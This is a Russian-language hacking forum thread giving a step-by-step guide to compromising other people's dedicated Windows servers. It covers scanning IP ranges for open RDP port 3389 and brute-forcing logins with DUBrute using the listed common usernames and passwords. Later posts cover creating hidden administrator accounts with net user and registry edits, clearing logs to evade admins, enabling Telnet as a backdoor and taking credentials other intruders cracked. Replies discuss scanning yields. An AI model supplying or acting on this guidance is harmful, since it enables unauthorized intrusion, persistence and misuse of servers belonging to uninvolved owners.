Использование и взлом Dedicated Server

Discussion in 'Хостинги - Hostings' started by Sind-blog, 13 Aug 2011.

  1. Sind-blog

    Sind-blog Хэш-крякер

    Joined:
    4 May 2011
    Messages:
    452
    Likes Received:
    115
    Reputations:
    32
    .:Немного о Dedicated Server:.
    Выделенный сервер (англ. dedicated server) — вид хостинга, при котором клиенту целиком предоставляется отдельная физическая машина (в противоположность виртуальному хостингу). Обычно используется для запуска приложений, которые не могут сосуществовать на одном сервере с другими проектами или имеют повышенные требования к ресурсам.
    В дальнейшем мы будем называть его дед или дедик.

    .:Подготовка к "охоте":.
    Нам понадобится:
    1) Прямые руки (Нет? Выпрямляем.)
    2) DUBrute (Качаем, разархавируем)
    3) VNC 1.2 (Качаем, разархавируем)

    .:Отправляемся на охоту:.
    Сканирование IP адресов порта 3389:
    Предупрежу сразу, что процесс может занять очень много времени.
    1) Запускаем файл vnc_scanner_gui.exe из архива VNC1.2.rar
    2) Справа выбираем страну, где должен находится дедик, например Russian Federation (Россия)
    3) Нажимаем Get diap list. В окошке будут диапазоны IP адресов.
    4) Нажимаем Start scan. Откроется командная строка с отображением процесса. Сканирование диапазонов на открытый 3389 порт пошло.
    5) Допустим у нас найдено 500 IP адресов. Если вы думаете, что этого хватит - остановите сканирование закрытием командной строки. Все, подходящие IP были сохранены в VNC_bypauth.txt, который находится в папке с программой. НО IP адреса нужно очистить (привести в вид IP через строку).
    6) Нажимаем Start Parser, ваши IP адреса, найденные в VNC_bypauth.txt сохранятся видом IP в файле IPs.txt

    Добываем себе первый дедик:

    1) Запускаем файл DUBrute.exe из архива DUBrute.rar
    2) Нажимаем Generation
    3) Открывается окно. В первой вкладке IP нажимаем File IP, выбираем файл со списком IP адресов (в нашем случае IPs.txt)
    4) Во второй вкладке Login вписываем логины на которые будем брутить дед. Или выбираем файл со списком логинов. Рекомендую использовать 3-4 логина.
    5) В третьеё вкладке Password так же вписываем или выбираем файл со списком паролей. Рекомендую использовать 100-200 паролей.
    6) В нижней вкладке Main выбираем файл source.txt в папке с прогой DUBrute.exe
    7) Нажимаем Make.
    8) Нажимаем ОК.
    9) Нажимаем Exit.
    10) В окне с прогой нажимаем Config.
    11) Source - выбираем файл source.txt
    12) Bad - выбираем файл bad.txt
    13) Good - выбираем файл good.txt
    14) Thread - пишем количество потоков. (для среднего канала рекомендую 100-150 потоков)
    15) Try connections - выбираем количество повторных подключений после неудачных. (рекомендую 1)
    16) TimeOut - выбираем кол-во мсек. после подключения к деду. (рекомендую 20)
    17) Нажимаем ОК.
    18) (Самый ответственный шаг!) Нажимаем Start.
    19) Ставим на ночь или 7-8 часов комп, просыпаемся - смотрим количество гудов в строке good. Все гуды сохраняются в файле good.txt
    ю
    P.S. Деды сохраняются в виде IP@Login;Password (некоторые бруты используют другой формат).
    P.S. 2 В программе в строке PPS, отображается текущая скорость брута (паролей в секунду).
    P.S. 3 В программе в строке APPS, отображается средняя скорость брута (паролей в секунду).
    P.S. 4 Скорость перебора паролей\логинов зависит от кол-ва IP адресов, паролей, логинов, скорости интернета.

    .:Самые распространенные логины:.
    PHP:
    administrator
    admin
    user
    manager
    root
    support
    service
    system
    user
    user1
    user2
    user3
    usuario
    server
    test 
    test1
    test2
    test3
    .:Самые распространенные пароли:.
    PHP:
    administrator
    admin
    user
    usuario
    manager
    root
    server
    support
    service
    system
    123
    test1
    system
    test
    12345
    qwerty
    0123
    1234
    1
    12
    123
    1342
    11
    111
    1111
    11111
    111111
    22
    333
    4444
    55555
    666666
    7777777
    88888888
    999999999
    0
    00
    000
    0000
    00000
    000000
    0000000
    00000000
    000000000
    0000000000
    P
    @ssw0rd
    pass
     
  2. Sind-blog

    Sind-blog Хэш-крякер

    Joined:
    4 May 2011
    Messages:
    452
    Likes Received:
    115
    Reputations:
    32
    .:FAQ:.
    Для чего нужны дедики? Чем они полезны?
    Применяют их для разных целей для брута, спама, флуда... Короче для того что требует больших ресурсов и много времени.

    Как подключится к дедику?
    Для того чтобы зайти на дедик нужно выполнить команду mstsc.exe в командной строке, ввести IP адрес подключаемого дедика, затем если дедик пингуется (не выключен), вылезет окно на весь экран со стандартным вводом логина или пароля.

    На что требуется обращать внимание при выборе дедика?
    Канал, RAM, Камень (процессор), CPU, ОС, аптайм, покер. Вот примеры:
    Где взять дедик?
    Существуют 3 варианта:
    1 - Купить.
    2 - Клянчить в халяве.
    3 - Сбрутить.

    Сколько прослужит дедик?
    Всё зависит от твоих действий и админов. Если ты будешь находиться на дедике соблюдая простые правила, то он прослужит долго.
    Рассмотрим правила поведения на дедике:
    -Ни чего не удаляй!
    -Без ОСОБОЙ нужды нельзя к чужим учёткам
    -Не храни файлы на рабочем столе, хранить все желательно в скрытой папке в C:\Windows\ и глубже.
    -Сильно не грузи дедик, что бы твои процессы не спалил админ.
    -Сlearlogs или ClrLogs by DDM - юзать после каждого использоввание дедика.
    -Всегда закрывать программы, окна и т.д при выходе.
    -И меньше делать системный ошибок, чтобы они не записывались в логах.

    Как добавить нового юзера?
    Пример работы ОС Windows 2000.
    Открывай Administrative Tools => Computer Management => находим там вкладку Local Users and Groups => щёлкаем правой кнопкой мыши по вкладке Users => Create new user.
    Командная строка:
    net user Имя_пользователя пароль /add
    net localgroup Administrators Имя_пользователя /add
    net localgroup "Remote Desktop Users" Имя_пользователя /add
    net accounts /maxpwage:unlimited

    Теперь давай разберём каждую команду:

    net user Имя_пользователя пароль /add - Добавляет нового пользователя с указанным именем и паролем
    net localgroup Administrators Имя_пользователя /add - Добавляет нужного пользователя к группе администраторов
    net localgroup "Remote Desktop Users" Имя_пользователя /add - Добавляет нужного пользователя к группе удалённых пользоваелей
    net accounts /maxpwage:unlimited - позволяет избежать истечения срока действия пароля (14 дней)

    Например, если ты хочешь создать учётку с именем user и паролем password, то команды будут выглядеть так:

    net user user password /add
    net localgroup Administrators user /add
    net localgroup "Remote Desktop Users" user /add
    net accounts /maxpwage:unlimited

    В чем проблема, не могу подключиться к дедику, хотя раньше подключался?
    Ты засветился и твой аккаунт удалил админ, или дедик отключили от инета.

    Как залить файлы на дедик?
    Запаковать на своём компьютере весь нужный софт в один архив, и залей его на любой файлообменник (например, rghost.ru), cкопируй ссылку для скачивания, заходи на дедик, запускай там браузер, переходи по ссылке для скачивания, и скачивай свой софт на дедик.

    Как скрыть учетку из винлогона?
    Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL__MACHINE>SOFTWARE>Microsoft>WindowsNT>C urrentVersion>Winlogon>SpecialAccounts>UserList и создаём там новый параметр DWORD (правой кнопкой мыши, новый параметр DWORD) Называем этот параметр именем твоего аккаунта, и присваиваем ему численное значение 0.

    Проблема в том, что при выходе через 5 мин вырубается сессия :confused:
    1. My Computer - Правой кнопкой мыши - Manage - Local users and groups - Users - Твой акк - Правой кнопкой мыши - Properties - Вкладка Sessions - Везде должно стоять Never.
    2. gpedit.msc - Computer... -Admini ...- Terminal Server... - смотришь, что сконфигурировано.
    3. tscc.msc - RDP - проверяй вкладки.
    4. net accounts /forcelogoff:no
    5. net accounts /maxpwage:unlimited
    6. Start - Adm tools - term serv conf -connections -sessions: Снять первые 2 галки или active desktop -enable

    Где взять логины и пасы?
    В интернете – полно. Напиши в гугле "Пароли для брута" или "Логины для брута"
     
  3. Sind-blog

    Sind-blog Хэш-крякер

    Joined:
    4 May 2011
    Messages:
    452
    Likes Received:
    115
    Reputations:
    32
    .:Рекомендации по юзанию дедика:.

    Если у вас есть очень ценный дедик, и вам не хотелось бы по каким либо причинам его терять, то на всякий пожарный врубите на дедике службу Telnet (режим терминального доступа к системе),это будет как запасной ход. Этим вы добьётесь того что если дедик вдруг прикроют, то вы хотя бы будете иметь чёрный ход к компу.

    Рекомендуется иметь не одну а две учётки. Это на тот случай если админ вас просёк и накрыл вашу учётку с которой вы брутили, то у вас хоть будет на крайняк учётка с которой сможете забрать гуды.

    Так если админ просёк что вы брутите на дедике, лучше с этого дедика больше не брутить.

    Как упоминалось выше, настоятельно не рекомендуется сильно нагружать дедик. Максимум на 50% процессора.

    Как зайдёте на дедик, в поисковой системе Windows'a рекомендуется поискать файлы с именем good.txt, goods.txt... Ведь ты можешь не один там сидеть и брутить.Таким способом ты можешь найти гуды которые сбрутил другой брутер, но еще не забрал их, и будет тебе халява. Только не удаляй чужие гуды и их файлы, а то он поймёт что он тут не один и больше не будет там брутить. А так ты можешь дальше пользоваться халявой, и каждый раз забирать его гуды ;-)

    (С)_Sind
     
    #3 Sind-blog, 13 Aug 2011
    Last edited: 13 Aug 2011
  4. gekich

    gekich New Member

    Joined:
    26 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    5) Допустим у нас найдено 500 IP адресов.

    ___


    у меня из 30к айпи найдено 30(ШТУК) валид.
    в чем проблема?
     
  5. NewCapital

    NewCapital Banned

    Joined:
    1 Nov 2009
    Messages:
    156
    Likes Received:
    95
    Reputations:
    14
    Не в валиде дело из 30к у 30 штук открыт порт 3389,тут как повезет
     
  6. gekich

    gekich New Member

    Joined:
    26 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    а порт ток 3389 брать, да?
    какие страны "Урожайные"?
     
  7. NewCapital

    NewCapital Banned

    Joined:
    1 Nov 2009
    Messages:
    156
    Likes Received:
    95
    Reputations:
    14
    ток 3389 бери
    не знаю,давно не брутил)
     
  8. gekich

    gekich New Member

    Joined:
    26 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    а диапазоны? Скок брать для скана?
     
  9. NewCapital

    NewCapital Banned

    Joined:
    1 Nov 2009
    Messages:
    156
    Likes Received:
    95
    Reputations:
    14
    Сколько хочешь,хоть всю страну сразу ,все зависит от тебя
     
  10. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,160
    Likes Received:
    366
    Reputations:
    226
    На 100 мбитном интернете, сканил в 5к потоков в секунду...Довольно много и быстро дедиков находит, если задать правельный диапазон.
    Особенно распространеная ошибка, сканят левые диапазоны и брутят на другом языке, в отличии от дедика например IT дедики на RU пассы :D
     
  11. CaspWeb

    CaspWeb New Member

    Joined:
    19 Aug 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Давно не занимался брутом дедиков. Думал уже не актуально :)

    А как открыть на машине 3389 порт? Не подскажите?)
     
  12. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,160
    Likes Received:
    366
    Reputations:
    226
    Воспользоваться гуглом, религия не позволяет?